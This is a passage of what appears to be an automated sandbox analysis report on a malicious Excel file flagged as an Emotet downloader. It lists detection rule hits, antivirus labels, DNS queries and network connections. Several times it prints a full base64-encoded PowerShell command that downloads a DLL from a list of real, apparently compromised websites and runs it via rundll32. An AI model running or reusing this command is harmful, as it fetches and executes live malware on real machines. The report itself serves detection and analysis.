AawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A, CommandLine: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQ

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: wscript c:\programdata\wetidjks.vbs, CommandLine: wscript c:\programdata\wetidjks.vbs, CommandLine|base64offset|contains: +, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3284, ParentProcessName: EXCEL.EXE, ProcessCommandLine: wscript c:\programdata\wetidjks.vbs, ProcessId: 3404, ProcessName: wscript.exe

Sigma detected: Cscript/Wscript Potentially Suspicious Child Process

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: wscript c:\programdata\wetidjks.vbs, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3404, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd, ProcessId: 1888, ProcessName: cmd.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3464, TargetFilename: C:\programdata\vbkwk.dll

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A, CommandLine: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQ

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: wscript c:\programdata\wetidjks.vbs, CommandLine: wscript c:\programdata\wetidjks.vbs, CommandLine|base64offset|contains: +, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3284, ParentProcessName: EXCEL.EXE, ProcessCommandLine: wscript c:\programdata\wetidjks.vbs, ProcessId: 3404, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3464, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A, CommandLine: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQ

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3464, TargetFilename: C:\Users\user\AppData\Local\Temp\bke2j5og.tns.ps1

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: xxTupY4Fr3.xlsx

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\jledshf.bat	Avira: detection malicious, Label: TR/Dldr.Emotet.A
Source: C:\ProgramData\wetidjks.vbs	Avira: detection malicious, Label: VBS/Bynoco.A

Multi AV Scanner detection for submitted file

Source: xxTupY4Fr3.xlsx

ReversingLabs: Detection: 71%

Machine Learning detection for sample

Source: xxTupY4Fr3.xlsx

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 20.23.238.122:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 77.37.50.35:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 20.23.238.122:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 147.79.116.130:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 15.197.148.33:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.3.222:443 -> 192.168.2.22:49180 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 207.174.214.153:443 -> 192.168.2.22:49182 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 63.250.43.9:443 -> 192.168.2.22:49186 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: .pdbdb source: powershell.exe, 00000005.00000002.477610402.00000000004B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbdb,, r source: powershell.exe, 00000009.00000002.515482549.000000001A656000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbdb: source: powershell.exe, 0000000D.00000002.520619942.000000001AC54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 0000000D.00000002.520619942.000000001AC90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.520619942.000000001AD15000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: c:\programdata\wetidjks.vbs			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: c:\programdata\jledshf.bat			Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\wscript.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: actividades.laforetlanguages.com
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: trasix.com
Source: global traffic	DNS query: name: www.parkinsons.co.in
Source: global traffic	DNS query: name: www.parkinsons.co.in
Source: global traffic	DNS query: name: parkinsons.co.in
Source: global traffic	DNS query: name: biz.merlin.ua
Source: global traffic	DNS query: name: actividades.laforetlanguages.com
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: biz.merlin.ua
Source: global traffic	DNS query: name: biz.merlin.ua
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: trasix.com
Source: global traffic	DNS query: name: www.parkinsons.co.in
Source: global traffic	DNS query: name: www.parkinsons.co.in
Source: global traffic	DNS query: name: www.parkinsons.co.in
Source: global traffic	DNS query: name: www.parkinsons.co.in
Source: global traffic	DNS query: name: actividades.laforetlanguages.com
Source: global traffic	DNS query: name: biz.merlin.ua
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: sbcopylive.com.br
Source: global traffic	DNS query: name: www.parkinsons.co.in
Source: global traffic	DNS query: name: www.parkinsons.co.in
Source: global traffic	DNS query: name: parkinsons.co.in
Source: global traffic	DNS query: name: biz.merlin.ua
Source: global traffic	DNS query: name: biz.merlin.ua
Source: global traffic	DNS query: name: bruckevn.site
Source: global traffic	DNS query: name: pardiskood.com
Source: global traffic	DNS query: name: daujimaharajmandir.org
Source: global traffic	DNS query: name: datasits.com
Source: global traffic	DNS query: name: anugerahmasinternasional.co.id
Source: global traffic	DNS query: name: biz.merlin.ua
Source: global traffic	DNS query: name: atmedic.cl
Source: global traffic	DNS query: name: atmedic.cl
Source: global traffic	DNS query: name: atmedic.cl
Source: global traffic	DNS query: name: atmedic.cl
Source: global traffic	DNS query: name: atmedic.cl
Source: global traffic	DNS query: name: anwaralbasateen.com
Source: global traffic	DNS query: name: anwaralbasateen.com
Source: global traffic	DNS query: name: biz.merlin.ua
Source: global traffic	DNS query: name: bruckevn.site
Source: global traffic	DNS query: name: bruckevn.site
Source: global traffic	DNS query: name: pardiskood.com
Source: global traffic	DNS query: name: daujimaharajmandir.org
Source: global traffic	DNS query: name: datasits.com

Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 147.79.119.141:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 147.79.119.141:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 147.79.119.141:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 147.79.119.141:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 147.79.119.141:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
